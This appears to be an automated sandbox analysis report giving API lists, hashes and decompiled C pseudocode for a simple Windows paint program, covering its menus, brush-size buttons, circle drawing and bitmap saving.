                                              APIs
                                              • CreateWindowExW.USER32 ref: 002FD47A
                                              • GetDC.USER32(?), ref: 002FD48C
                                              • CreateCompatibleDC.GDI32(?), ref: 002FD499
                                              • CreateCompatibleBitmap.GDI32(?,000001F4,0000015E), ref: 002FD4B0
                                              • SelectObject.GDI32(?,?), ref: 002FD4C1
                                              • BitBlt.GDI32(?,00000000,00000000,000001F4,0000015E,?,00000000,00000000,00CC0020), ref: 002FD4E9
                                              • SelectObject.GDI32(?,?), ref: 002FD4F7
                                              • DeleteObject.GDI32(?), ref: 002FD501
                                              • DeleteObject.GDI32(?), ref: 002FD50B
                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 002FD557
                                              • DeleteObject.GDI32(?), ref: 002FD572
                                              • DestroyWindow.USER32(?), ref: 002FD57E
                                              • DefWindowProcW.USER32(?,00000001,?,?), ref: 002FD594
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Object$CreateDeleteWindow$CompatibleSelect$BitmapDestroyFileNameOpenProc
                                              • String ID: 4K0$@K0$X$button
                                              • API String ID: 2517243105-1100839627
                                              • Opcode ID: 8e351130efeec61648f2ed0fbb18562ae1848318521fafc9f96196b05ed8b7a4
                                              • Instruction ID: c10537d6c6a7636b83f40705adc118003bd9f99f614a95a35bcade4454d79bf8
                                              • Opcode Fuzzy Hash: 8e351130efeec61648f2ed0fbb18562ae1848318521fafc9f96196b05ed8b7a4
                                              • Instruction Fuzzy Hash: C7410AB5A50208EBDB14DFA0DC59FBEB7B5AB48741F108528FB05AB290DBB59A00CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC900(struct HWND__* _a4) {
                                              				struct HMENU__* _v8;
                                              				struct HMENU__* _v12;
                                              				struct HMENU__* _v16;
                                              				struct HMENU__* _v20;
                                              
                                              				_v16 = CreateMenu();
                                              				_v20 = CreateMenu();
                                              				_v8 = CreateMenu();
                                              				_v12 = CreateMenu();
                                              				AppendMenuW(_v20, 0, 0xa, 0x304780);
                                              				AppendMenuW(_v20, 0, 0xb, 0x30478c);
                                              				AppendMenuW(_v8, 0, 0xc, 0x304798);
                                              				AppendMenuW(_v8, 0, 0xd, 0x3047ac);
                                              				AppendMenuW(_v8, 0, 0xe, 0x3047c0);
                                              				AppendMenuW(_v8, 0x800, 0, 0);
                                              				AppendMenuW(_v8, 0, 1, 0x3047cc);
                                              				AppendMenuW(_v8, 0, 1, 0x3047dc);
                                              				AppendMenuW(_v12, 0, 3, 0x3047f0);
                                              				AppendMenuW(_v12, 0, 1, 0x304808);
                                              				AppendMenuW(_v12, 0, 0xf, 0x304818);
                                              				AppendMenuW(_v16, 0x10, _v20, 0x30482c);
                                              				AppendMenuW(_v16, 0x10, _v12, 0x304838);
                                              				AppendMenuW(_v16, 0x10, _v8, 0x304848);
                                              				return SetMenu(_a4, _v16);
                                              			}

                                              0x002fc90c
                                              0x002fc915
                                              0x002fc91e
                                              0x002fc927
                                              0x002fc937
                                              0x002fc94a
                                              0x002fc95d
                                              0x002fc970
                                              0x002fc983
                                              0x002fc996
                                              0x002fc9a9
                                              0x002fc9bc
                                              0x002fc9cf
                                              0x002fc9e2
                                              0x002fc9f5
                                              0x002fca0a
                                              0x002fca1f
                                              0x002fca34
                                              0x002fca4b

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Menu$Append$Create
                                              • String ID:
                                              • API String ID: 508680711-0
                                              • Opcode ID: d56284e506ee990aae235beb6f46758a1c52f0257b7e0cb193e9b9f86cd032c9
                                              • Instruction ID: 4e4399401736d2d8082761ab7defd37d6f88db0f9f50055c06793ba720eebf12
                                              • Opcode Fuzzy Hash: d56284e506ee990aae235beb6f46758a1c52f0257b7e0cb193e9b9f86cd032c9
                                              • Instruction Fuzzy Hash: A041F175A80304BBDB119BE1EC6EFBF7B35BB54B51F014958F319AA1E0C6B19A00CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD620(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 1) {
                                              					CreateWindowExW(0, L"button", L"32px", 0x50000000, 0x32, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"64px", 0x50000000, 0x55, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"128px", 0x50000000, 0x73, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              					CreateWindowExW(0, L"button", L"256px", 0x50000000, 0x96, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v8 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v8 == 0x111) {
                                              							DestroyWindow(_a4);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}

                                              0x002fd627
                                              0x002fd62e
                                              0x002fd66f
                                              0x002fd698
                                              0x002fd6c1
                                              0x002fd6ed
                                              0x002fd630
                                              0x002fd634
                                              0x002fd705
                                              0x002fd63a
                                              0x002fd641
                                              0x002fd6f9
                                              0x002fd6f9
                                              0x002fd641
                                              0x002fd634
                                              0x002fd724

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Window$Create$Destroy$Proc
                                              • String ID: 128px$256px$32px$64px$button$button$button$button
                                              • API String ID: 3952264185-740826005
                                              • Opcode ID: 216e3887d6d73487e7b5a9338cc8fd2210a8a55af58d492f38a60c0944ff06a4
                                              • Instruction ID: c6d594fe9e2ba9dd701f18af6f1a68252f1e5e04e61b8b6f80d1c4b09b4f4056
                                              • Opcode Fuzzy Hash: 216e3887d6d73487e7b5a9338cc8fd2210a8a55af58d492f38a60c0944ff06a4
                                              • Instruction Fuzzy Hash: 4721F9753D034CBBFB25DE50DD5AFEA7625AB08F41F104114FB096E1D1D2F1AA409754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E002FCE30(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
                                              				struct HDC__* _v8;
                                              				int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				intOrPtr _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				struct tagPAINTSTRUCT _v96;
                                              				long _t102;
                                              				long _t125;
                                              				intOrPtr _t168;
                                              				long _t180;
                                              				long _t187;
                                              				long _t200;
                                              				long _t212;
                                              				long _t222;
                                              				long _t226;
                                              				intOrPtr _t229;
                                              				long _t240;
                                              				long _t247;
                                              				long _t253;
                                              				long _t255;
                                              				long _t257;
                                              				long _t259;
                                              
                                              				_v12 = _a8;
                                              				if(_v12 > 0x200) {
                                              					__eflags = _v12 - 0x201;
                                              					if(_v12 == 0x201) {
                                              						 *0x305990 = _a16 & 0xffff;
                                              						 *0x305988 = _a16 >> 0x00000010 & 0xffff;
                                              						 *0x305994 =  *0x305990;
                                              						 *0x30598c =  *0x305988;
                                              						 *0x305940 = 1;
                                              						_t174 = _a4;
                                              						_v8 = GetDC(_a4);
                                              						__eflags =  *0x304b3c - 2;
                                              						if( *0x304b3c == 2) {
                                              							 *0x304a00 = GetPixel(_v8,  *0x305990,  *0x305988);
                                              						} else {
                                              							_t229 =  *0x3059c0;
                                              							__eflags =  *((intOrPtr*)(_t229 + 8)) -  *0x3059c4;
                                              							if( *((intOrPtr*)(_t229 + 8)) !=  *0x3059c4) {
                                              								_t174 =  *0x3059c0;
                                              								E002FB910( *0x3059c0);
                                              							}
                                              							E002FC2C0(_t174, 0x3059c4, 0x3059c0);
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							_t226 =  *0x304a00; // 0xffffff
                                              							E002FC390( *0x305990,  *0x3059c0,  *0x305990,  *0x305988, GetPixel(_v8,  *0x305990,  *0x305988), _t226);
                                              						}
                                              						__eflags =  *0x304b3c - 6;
                                              						if(__eflags != 0) {
                                              							__eflags =  *0x304b3c - 5;
                                              							if( *0x304b3c != 5) {
                                              								_t222 =  *0x304a00; // 0xffffff
                                              								SetPixel(_v8,  *0x305990,  *0x305988, _t222);
                                              							}
                                              						} else {
                                              							_t102 = GetPixel(_v8,  *0x305990,  *0x305988);
                                              							_t180 =  *0x304a00; // 0xffffff
                                              							E002FB540(__eflags, _v8,  *0x305990,  *0x305988, _t180, _t102, 0, 0, 0,  *0x3059c0);
                                              						}
                                              						ReleaseDC(_a4, _v8);
                                              						L55:
                                              						return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              					}
                                              					__eflags = _v12 - 0x202;
                                              					if(_v12 == 0x202) {
                                              						 *0x305940 = 0;
                                              						_v8 = GetDC(_a4);
                                              						__eflags =  *0x304b3c - 4;
                                              						if( *0x304b3c == 4) {
                                              							L39:
                                              							SelectObject(_v8, GetStockObject(5));
                                              							_v32 = _a16 & 0xffff;
                                              							_v28 = _a16 >> 0x00000010 & 0xffff;
                                              							__eflags =  *0x304b3c - 4;
                                              							if( *0x304b3c != 4) {
                                              								__eflags =  *0x304b3c - 3;
                                              								if( *0x304b3c != 3) {
                                              									__eflags =  *0x304b3c - 5;
                                              									if( *0x304b3c == 5) {
                                              										_push(1);
                                              										_t187 =  *0x304a00; // 0xffffff
                                              										E002FB9D0(_v8,  *0x305990,  *0x305988, E002FB900(_v32,  *0x305990,  *0x305988, _v32, _v28), _t187,  *0x3059c0, 1);
                                              									}
                                              								} else {
                                              									_t125 =  *0x304a00; // 0xffffff
                                              									E002FBE50(_v8, _v8,  *0x305990,  *0x305988, _v32, _v28, _t125,  *0x3059c0, 1, 1);
                                              								}
                                              							} else {
                                              								_t240 =  *0x304a00; // 0xffffff
                                              								E002FBD50(_v8,  *0x305990,  *0x305988, _v32, _v28, _t240,  *0x3059c0, 1, 1);
                                              							}
                                              							L45:
                                              							ReleaseDC(_a4, _v8);
                                              							goto L55;
                                              						}
                                              						__eflags =  *0x304b3c - 3;
                                              						if( *0x304b3c == 3) {
                                              							goto L39;
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							goto L45;
                                              						}
                                              						goto L39;
                                              					} else {
                                              						goto L55;
                                              					}
                                              				}
                                              				if(_v12 == 0x200) {
                                              					__eflags =  *0x305940 - 1;
                                              					if( *0x305940 != 1) {
                                              						L35:
                                              						goto L55;
                                              					}
                                              					_v8 = GetDC(_a4);
                                              					_v16 = _a16 & 0xffff;
                                              					_v20 = _a16 >> 0x00000010 & 0xffff;
                                              					__eflags =  *0x304b3c - 1;
                                              					if( *0x304b3c != 1) {
                                              						L25:
                                              						__eflags =  *0x304b3c - 4;
                                              						if( *0x304b3c == 4) {
                                              							L28:
                                              							SetROP2(_v8, 6);
                                              							__eflags =  *0x304b3c - 4;
                                              							if( *0x304b3c != 4) {
                                              								__eflags =  *0x304b3c - 3;
                                              								if( *0x304b3c != 3) {
                                              									__eflags =  *0x304b3c - 5;
                                              									if( *0x304b3c == 5) {
                                              										_push(0);
                                              										_t247 =  *0x304a00; // 0xffffff
                                              										E002FB9D0(_v8,  *0x305990,  *0x305988, E002FB900( *0x305990,  *0x305990,  *0x305988,  *0x305994,  *0x30598c), _t247, 0, 0);
                                              										_push(0);
                                              										_t200 =  *0x304a00; // 0xffffff
                                              										E002FB9D0(_v8,  *0x305990,  *0x305988, E002FB900(_v16,  *0x305990,  *0x305988, _v16, _v20), _t200, 0, 0);
                                              									}
                                              								} else {
                                              									_t253 =  *0x304a00; // 0xffffff
                                              									E002FBE50( *0x305988, _v8,  *0x305990,  *0x305988,  *0x305994,  *0x30598c, _t253, 0, 0, 0);
                                              									_t255 =  *0x304a00; // 0xffffff
                                              									E002FBE50( *0x305988, _v8,  *0x305990,  *0x305988, _v16, _v20, _t255, 0, 0, 0);
                                              								}
                                              							} else {
                                              								_t257 =  *0x304a00; // 0xffffff
                                              								E002FBD50(_v8,  *0x305990,  *0x305988,  *0x305994,  *0x30598c, _t257, 0, 0, 0);
                                              								_t259 =  *0x304a00; // 0xffffff
                                              								E002FBD50(_v8,  *0x305990,  *0x305988, _v16, _v20, _t259, 0, 0, 0);
                                              							}
                                              							L34:
                                              							 *0x305994 = _v16;
                                              							 *0x30598c = _v20;
                                              							ReleaseDC(_a4, _v8);
                                              							goto L35;
                                              						}
                                              						__eflags =  *0x304b3c - 3;
                                              						if( *0x304b3c == 3) {
                                              							goto L28;
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							goto L34;
                                              						}
                                              						goto L28;
                                              					}
                                              					__eflags = _v16 -  *0x305994;
                                              					if(_v16 !=  *0x305994) {
                                              						L24:
                                              						_t212 =  *0x304a00; // 0xffffff
                                              						E002FBE50( *0x305994, _v8,  *0x305994,  *0x30598c, _v16, _v20, _t212,  *0x3059c0, 1, 0);
                                              						goto L34;
                                              					}
                                              					__eflags = _v20 -  *0x30598c;
                                              					if(_v20 ==  *0x30598c) {
                                              						goto L25;
                                              					}
                                              					goto L24;
                                              				}
                                              				if(_v12 == 2) {
                                              					PostQuitMessage(0);
                                              					goto L55;
                                              				}
                                              				if(_v12 == 0xf) {
                                              					_v8 = BeginPaint(_a4,  &_v96);
                                              					_v24 =  *0x3059b0;
                                              					while(1) {
                                              						__eflags = 1;
                                              						if(1 == 0) {
                                              							break;
                                              						}
                                              						_v24 =  *((intOrPtr*)(_v24 + 8));
                                              						__eflags = _v24 -  *0x3059c4;
                                              						if(_v24 ==  *0x3059c4) {
                                              							L51:
                                              							break;
                                              						}
                                              						_t168 =  *0x3059c0;
                                              						__eflags = _v24 -  *((intOrPtr*)(_t168 + 8));
                                              						if(_v24 !=  *((intOrPtr*)(_t168 + 8))) {
                                              							E002FC0F0(_v24, _a4);
                                              							continue;
                                              						}
                                              						goto L51;
                                              					}
                                              					EndPaint(_a4,  &_v96);
                                              				} else {
                                              				}
                                              			}

                                              0x002fce39
                                              0x002fce43
                                              0x002fce6b
                                              0x002fce72
                                              0x002fce92
                                              0x002fcea6
                                              0x002fceb2
                                              0x002fcebd
                                              0x002fcec2
                                              0x002fcecc
                                              0x002fced6
                                              0x002fced9
                                              0x002fcee0
                                              0x002fcf27
                                              0x002fcee2
                                              0x002fcee2
                                              0x002fceeb
                                              0x002fcef1
                                              0x002fcef3
                                              0x002fcefa
                                              0x002fcefa
                                              0x002fcf09
                                              0x002fcf09
                                              0x002fcf2c
                                              0x002fcf33
                                              0x002fcf35
                                              0x002fcf68
                                              0x002fcf68
                                              0x002fcf6d
                                              0x002fcf74
                                              0x002fcfba
                                              0x002fcfc1
                                              0x002fcfc3
                                              0x002fcfdb
                                              0x002fcfdb
                                              0x002fcf76
                                              0x002fcf94
                                              0x002fcf9b
                                              0x002fcfb3
                                              0x002fcfb3
                                              0x002fcfe9
                                              0x002fd3df
                                              0x002fd3f8
                                              0x002fd3f8
                                              0x002fce74
                                              0x002fce7b
                                              0x002fd233
                                              0x002fd247
                                              0x002fd24a
                                              0x002fd251
                                              0x002fd269
                                              0x002fd276
                                              0x002fd287
                                              0x002fd299
                                              0x002fd29c
                                              0x002fd2a3
                                              0x002fd2da
                                              0x002fd2e1
                                              0x002fd314
                                              0x002fd31b
                                              0x002fd31d
                                              0x002fd327
                                              0x002fd35b
                                              0x002fd35b
                                              0x002fd2e3
                                              0x002fd2ee
                                              0x002fd30d
                                              0x002fd30d
                                              0x002fd2a5
                                              0x002fd2b0
                                              0x002fd2d0
                                              0x002fd2d0
                                              0x002fd360
                                              0x002fd368
                                              0x00000000
                                              0x002fd368
                                              0x002fd253
                                              0x002fd25a
                                              0x00000000
                                              0x00000000
                                              0x002fd25c
                                              0x002fd263
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fce81
                                              0x00000000
                                              0x002fce81
                                              0x002fce7b
                                              0x002fce4c
                                              0x002fcff4
                                              0x002fcffb
                                              0x002fd22e
                                              0x00000000
                                              0x002fd22e
                                              0x002fd00b
                                              0x002fd019
                                              0x002fd02b
                                              0x002fd02e
                                              0x002fd035
                                              0x002fd082
                                              0x002fd082
                                              0x002fd089
                                              0x002fd0a1
                                              0x002fd0a7
                                              0x002fd0ad
                                              0x002fd0b4
                                              0x002fd116
                                              0x002fd11d
                                              0x002fd17f
                                              0x002fd186
                                              0x002fd18c
                                              0x002fd192
                                              0x002fd1cb
                                              0x002fd1d0
                                              0x002fd1d6
                                              0x002fd20a
                                              0x002fd20a
                                              0x002fd11f
                                              0x002fd125
                                              0x002fd14a
                                              0x002fd155
                                              0x002fd175
                                              0x002fd175
                                              0x002fd0b6
                                              0x002fd0bc
                                              0x002fd0e1
                                              0x002fd0ec
                                              0x002fd10c
                                              0x002fd10c
                                              0x002fd20f
                                              0x002fd212
                                              0x002fd21a
                                              0x002fd228
                                              0x00000000
                                              0x002fd228
                                              0x002fd08b
                                              0x002fd092
                                              0x00000000
                                              0x00000000
                                              0x002fd094
                                              0x002fd09b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fd09b
                                              0x002fd03a
                                              0x002fd040
                                              0x002fd04d
                                              0x002fd057
                                              0x002fd078
                                              0x00000000
                                              0x002fd078
                                              0x002fd045
                                              0x002fd04b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002fd04b
                                              0x002fce56
                                              0x002fd372
                                              0x00000000
                                              0x002fd372
                                              0x002fce60
                                              0x002fd388
                                              0x002fd391
                                              0x002fd394
                                              0x002fd399
                                              0x002fd39b
                                              0x00000000
                                              0x00000000
                                              0x002fd3a3
                                              0x002fd3a9
                                              0x002fd3af
                                              0x002fd3be
                                              0x00000000
                                              0x002fd3be
                                              0x002fd3b1
                                              0x002fd3b9
                                              0x002fd3bc
                                              0x002fd3ca
                                              0x00000000
                                              0x002fd3cf
                                              0x00000000
                                              0x002fd3bc
                                              0x002fd3d9
                                              0x00000000
                                              0x002fce66

                                              APIs
                                              • GetDC.USER32(00000200), ref: 002FD005
                                              • ReleaseDC.USER32 ref: 002FD228
                                              • PostQuitMessage.USER32(00000000), ref: 002FD372
                                              • BeginPaint.USER32(0000000F,?), ref: 002FD382
                                              • EndPaint.USER32(0000000F,?), ref: 002FD3D9
                                              • DefWindowProcW.USER32(00000201,?,?,?), ref: 002FD3EF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Paint$BeginMessagePostProcQuitReleaseWindow
                                              • String ID:
                                              • API String ID: 76768696-0
                                              • Opcode ID: eed4006fac38964ef7ae2366e636e574910da7223499f764b43d4d7463a9f399
                                              • Instruction ID: f9d3ce9085b596cb68455e6053cb47681f63e8956b31e91e5b9020cdb8df749c
                                              • Opcode Fuzzy Hash: eed4006fac38964ef7ae2366e636e574910da7223499f764b43d4d7463a9f399
                                              • Instruction Fuzzy Hash: 1B02EAB5612508EFCB15CF99ECA4E7BB7BABB48750F10851AF309972A0C770A950CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FB9D0(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, long _a20, intOrPtr _a24, intOrPtr _a28) {
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _t176;
                                              
                                              				_v16 = 1 - _a16;
                                              				_v8 = 0;
                                              				_v12 = _a16;
                                              				_v20 = 3;
                                              				_t176 = 5 - (_a16 << 1);
                                              				_v24 = 5;
                                              				while(_v12 >= _v8) {
                                              					if(_a28 != 0) {
                                              						E002FC390(_a24, _a24, _a8 + _v8, _a12 + _v12, 0xffffff - GetPixel(_a4, _a8 + _v8, _a12 + _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v12, _a12 + _v8, 0xffffff - GetPixel(_a4, _a8 + _v12, _a12 + _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v8, _a12 - _v12, 0xffffff - GetPixel(_a4, _a8 + _v8, _a12 - _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v12, _a12 + _v8, 0xffffff - GetPixel(_a4, _a8 - _v12, _a12 + _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 + _v12, _a12 - _v8, 0xffffff - GetPixel(_a4, _a8 + _v12, _a12 - _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v8, _a12 - _v12, 0xffffff - GetPixel(_a4, _a8 - _v8, _a12 - _v12), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v12, _a12 - _v8, 0xffffff - GetPixel(_a4, _a8 - _v12, _a12 - _v8), _a20);
                                              						E002FC390(_a24, _a24, _a8 - _v8, _a12 + _v12, 0xffffff - GetPixel(_a4, _a8 - _v8, _a12 + _v12), _a20);
                                              					}
                                              					SetPixel(_a4, _a8 + _v8, _a12 + _v12, _a20);
                                              					SetPixel(_a4, _a8 + _v8, _a12 - _v12, _a20);
                                              					if(_v8 != _v12) {
                                              						SetPixel(_a4, _a8 + _v12, _a12 + _v8, _a20);
                                              						SetPixel(_a4, _a8 - _v12, _a12 + _v8, _a20);
                                              					}
                                              					if(_v8 != 0) {
                                              						SetPixel(_a4, _a8 - _v8, _a12 + _v12, _a20);
                                              						SetPixel(_a4, _a8 - _v8, _a12 - _v12, _a20);
                                              					}
                                              					if(_v8 != _v12 && _v8 != 0) {
                                              						SetPixel(_a4, _a8 + _v12, _a12 - _v8, _a20);
                                              						SetPixel(_a4, _a8 - _v12, _a12 - _v8, _a20);
                                              					}
                                              					if(_v16 >= 0) {
                                              						_v16 = _v16 + _v24;
                                              						_v20 = _v20 + 2;
                                              						_v24 = _v24 + 4;
                                              						_t176 = _v12 - 1;
                                              						_v12 = _t176;
                                              					} else {
                                              						_t176 = _v16 + _v20;
                                              						_v16 = _t176;
                                              						_v20 = _v20 + 2;
                                              						_v24 = _v24 + 2;
                                              					}
                                              					_v8 = _v8 + 1;
                                              				}
                                              				return _t176;
                                              			}
                                              APIs
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBA30
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBA6B
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBAA6
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBAE1
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBB1C
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBB57
                                              • GetPixel.GDI32(?,?,00000000), ref: 002FBB92
                                              • GetPixel.GDI32(?,00000000,?), ref: 002FBBCD
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC08
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC24
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBC48
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBC64
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBC86
                                              • SetPixel.GDI32(?,00000000,?,?), ref: 002FBCA2
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBCCC
                                              • SetPixel.GDI32(?,?,00000000,?), ref: 002FBCE8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 82e5d0e6bd46545fea573c4454ddfd597380d12e8f6077e61950101e6268d8d4
                                              • Instruction ID: ff76207a708b271be82467342edb7cdf6b54f46a92851b53fe10a231f359e6ae
                                              • Opcode Fuzzy Hash: 82e5d0e6bd46545fea573c4454ddfd597380d12e8f6077e61950101e6268d8d4
                                              • Instruction Fuzzy Hash: 1AD176B6510109EFCB04CFACD994DEFBBB9BF88350F108658FA1997254C630EA51DB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 85%
                                              			E002FB350(struct HBITMAP__* _a4, WCHAR* _a8) {
                                              				struct tagBITMAPINFO* _v8;
                                              				signed int _v12;
                                              				long _v16;
                                              				struct HDC__* _v20;
                                              				void* _v24;
                                              				signed int _v28;
                                              				long _v32;
                                              				intOrPtr _v38;
                                              				short _v40;
                                              				short _v42;
                                              				intOrPtr _v46;
                                              				void _v48;
                                              				signed short _v54;
                                              				signed short _v56;
                                              				int _v64;
                                              				signed int _v68;
                                              				void _v72;
                                              				struct HWND__* _v76;
                                              				struct HWND__* _v80;
                                              				struct HWND__* _v84;
                                              				struct HWND__* _v88;
                                              				signed int _v92;
                                              				struct HWND__* _v96;
                                              				signed int _v98;
                                              				short _v100;
                                              				int _v104;
                                              				signed int _v108;
                                              				void _v112;
                                              
                                              				_v20 = GetDC(0);
                                              				GetObjectW(_a4, 0x18,  &_v72);
                                              				_v112 = 0x28;
                                              				_v108 = _v68;
                                              				_v104 = _v64;
                                              				_v100 = 1;
                                              				_v98 = (_v56 & 0x0000ffff) * (_v54 & 0x0000ffff);
                                              				if((_v98 & 0x0000ffff) > 8) {
                                              					_v98 = 0x18;
                                              				}
                                              				_v96 = 0;
                                              				_v92 = 0;
                                              				_v88 = 0;
                                              				_v84 = 0;
                                              				_v80 = 0;
                                              				_v76 = 0;
                                              				if((_v98 & 0x0000ffff) != 0x18) {
                                              					_v28 = 1 << (_v98 & 0x0000ffff);
                                              				} else {
                                              					_v28 = 0;
                                              				}
                                              				_v12 = _v28 << 2;
                                              				_push(_v112 + _v12);
                                              				_v8 = E002F2487(_v112 + _v12);
                                              				memcpy(_v8,  &_v112, 0xa << 2);
                                              				GetDIBits(_v20, _a4, 0, _v64, 0, _v8, 0);
                                              				memcpy( &_v112, _v8, 0xa << 2);
                                              				if(_v92 == 0) {
                                              					_v92 = (((_v98 & 0x0000ffff) * _v108 + 0x0000001f & 0xffffffe0) >> 3) * _v104;
                                              				}
                                              				_v16 = _v112 + _v12 + _v92;
                                              				_push(_v16);
                                              				_push(_v8);
                                              				_v8 = E002F2477(_v112 + _v12 + _v92, _v16);
                                              				GetDIBits(_v20, _a4, 0, _v64, _v8 + _v112 + _v12, _v8, 0);
                                              				_v38 = _v12 + 0x36;
                                              				_v42 = 0;
                                              				_v40 = 0;
                                              				_v46 = _v16 + 0xe;
                                              				_v48 = 0x4d42;
                                              				_v24 = CreateFileW(_a8, 0x40000000, 0, 0, 2, 0x80, 0);
                                              				WriteFile(_v24,  &_v48, 0xe,  &_v32, 0);
                                              				WriteFile(_v24, _v8, _v16,  &_v32, 0);
                                              				ReleaseDC(0, _v20);
                                              				return CloseHandle(_v24);
                                              			}
                                              APIs
                                              • GetDC.USER32(00000000), ref: 002FB35A
                                              • GetObjectW.GDI32(?,00000018,?), ref: 002FB36D
                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,?,00000000), ref: 002FB438
                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 002FB4A6
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 002FB4E9
                                              • WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 002FB502
                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 002FB51A
                                              • ReleaseDC.USER32 ref: 002FB526
                                              • CloseHandle.KERNEL32(?), ref: 002FB530
                                              Strings
                                              Memory Dump Source
